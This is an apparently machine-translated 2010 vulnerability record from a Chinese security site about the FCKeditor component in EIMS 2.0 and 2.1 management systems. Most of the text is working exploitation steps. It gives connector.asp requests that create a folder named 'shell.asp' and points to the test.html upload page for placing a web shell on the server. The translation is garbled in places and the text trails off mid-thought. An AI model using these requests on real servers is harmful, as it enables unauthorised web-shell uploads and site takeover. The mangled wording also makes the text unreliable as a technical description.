EIMS editor vulnerability-vulnerability warning-the black bar safety net

2010-03-17T00:00:00
ID MYHACK58:62201026461
Type myhack58
Reporter 佚名
Modified 2010-03-17T00:00:00

Description

The specific use of the method He is Division 2. 1 2.0 two versions of the enterprise information management system eims_for_access_2. 1 real estate management system eims_house_for_access_2. 1

Using the method posted Version 2.1 The first step to build the SHELL. ASP folder /Include/FCKeditor/editor/filemanager/connectors/asp/connector. asp? Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell. asp&NewFolderName=z&uuid=1 2 4 4 7 8 9 9 7 5 6 8 4 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector. asp? Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell. asp

The second uploaded file /Include/FCKeditor/editor/filemanager/connectors/test.html#

2.0 just in Fck in with the directory FCKeditor/editor/filemanager/connectors/asp/connector. asp? Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell. asp&NewFolderName=z&uuid=1 2 4 4 7 8 9 9 7 5 6 8 4 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector. asp? Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell. asp

FCKeditor/editor/filemanager/connectors/test.html#

Similarly